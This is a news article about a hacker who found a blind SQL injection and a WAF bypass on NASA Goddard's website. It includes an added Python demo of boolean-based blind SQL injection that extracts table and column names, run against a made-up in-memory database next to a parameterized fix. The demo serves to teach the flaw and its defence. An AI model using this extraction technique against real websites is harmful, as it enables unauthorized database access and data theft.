German hacker D35m0nd142 has identified a couple of vulnerabilities on the website of NASA’s Goddard Space Flight Center (GSFC) that could have been leveraged by cybercriminals to cause some serious damage. Fortunately, the agency rushed to address the issues after being notified by the hacker.
D35m0nd142 has discovered a Blind SQL Injection vulnerability and a web application firewall (WAF) bypass flaw.
As demonstrated by the hacker, the SQL Injection bug could have been successfully exploited by a remote attacker to gain access to the site’s databases, including the ones containing user details.
The WAF bypass flaw meant that the web application firewall deployed in front of the site could be evaded, so the injection remained reachable despite the protection that was supposed to stop it.
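Neither the article nor the hacker published the payloads used. The following is an added example, not code from the original page or from D35m0nd142, showing the mechanics behind a boolean-based blind SQL injection of the kind described. It uses a constructed in-memory SQLite database and a hypothetical `news` article lookup: the vulnerable endpoint answers only "found" or "not found", yet that single bit per request is enough to read table and column names out of the database catalog, which is what "listing tables and columns" means in practice. The parameterized version beside it gives the same payload nothing to work with.

```python
import sqlite3
import string

# Characters tried for each position of the secret string (enough for typical identifiers).
CHARSET = string.ascii_lowercase + string.digits + "_"


def build_db():
    """Constructed demo database; the table and row contents are made up for this example."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE site_users (id INTEGER PRIMARY KEY, username TEXT, email TEXT)")
    conn.execute("INSERT INTO site_users (username, email) VALUES ('alice', 'alice@example.org')")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
    conn.execute("INSERT INTO news (title) VALUES ('Launch update')")
    return conn


def vulnerable_article_exists(conn, article_id):
    """Vulnerable: the request parameter is concatenated into the SQL text.

    The caller only learns whether a row came back, so nothing from the
    database is displayed directly; this is the 'blind' case."""
    sql = "SELECT 1 FROM news WHERE id = " + article_id
    return conn.execute(sql).fetchone() is not None


def safe_article_exists(conn, article_id):
    """Hardened: input is validated as an integer and passed as a bound parameter."""
    try:
        aid = int(article_id)
    except ValueError:
        return False
    return conn.execute("SELECT 1 FROM news WHERE id = ?", (aid,)).fetchone() is not None


def blind_extract(oracle, subquery, max_len=32):
    """Recover the single string returned by `subquery`, one character per loop.

    `oracle(payload)` must return True when the injected condition holds.
    Each probe asks: is character `pos` of the secret equal to `ch`?"""
    result = ""
    for pos in range(1, max_len + 1):
        found = None
        for ch in CHARSET:
            payload = f"1 AND substr(({subquery}),{pos},1) = '{ch}'"
            if oracle(payload):
                found = ch
                break
        if found is None:  # past the end of the string (substr returns '')
            break
        result += found
    return result


def demo():
    """Run the extraction against the vulnerable endpoint and the same payload against the safe one."""
    conn = build_db()
    oracle = lambda payload: vulnerable_article_exists(conn, payload)

    # Step 1: read a table name from the catalog (sqlite_master plays the role of information_schema).
    table = blind_extract(
        oracle,
        "SELECT name FROM sqlite_master WHERE type='table' ORDER BY name DESC LIMIT 1",
    )
    # Step 2: read a column name of that table (pragma_table_info needs SQLite >= 3.16).
    column = blind_extract(
        oracle,
        f"SELECT name FROM pragma_table_info('{table}') WHERE cid = 1",
    )
    return {
        "table": table,
        "column": column,
        # The oracle itself: a true condition keeps the row, a false one drops it.
        "vulnerable_true_branch": vulnerable_article_exists(conn, "1 AND 1=1"),
        "vulnerable_false_branch": vulnerable_article_exists(conn, "1 AND 1=2"),
        # The hardened endpoint rejects the payload outright; no inference is possible.
        "safe_true_branch": safe_article_exists(conn, "1 AND 1=1"),
    }


if __name__ == "__main__":
    print(demo())
```

The example runs about 40 requests per recovered character; a real attacker would binary-search on the character code instead, but the point is the same: as long as the application reflects one bit of query outcome, every name in the catalog is readable.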
“I haven't done and I will not do any type of damage. This attack hasn't any malicious purpose. I've just listed some tables and the most important columns of this database in order to demonstrate the big and dangerous vulnerability, not for fun,” the hacker said.
“As anyone can see, there is a lot of interesting and sensible information that could have been taken and exploited by malicious attackers and, for this reason, this bug needs to be repaired as soon as possible.”
To demonstrate the risks posed by the flaws he identified, the expert published a number of screenshots, along with the names of databases and tables that could have been accessed by an attacker exploiting them.
The large number of security breaches that have occurred recently has prompted NASA to take measures to protect the personal details of its employees.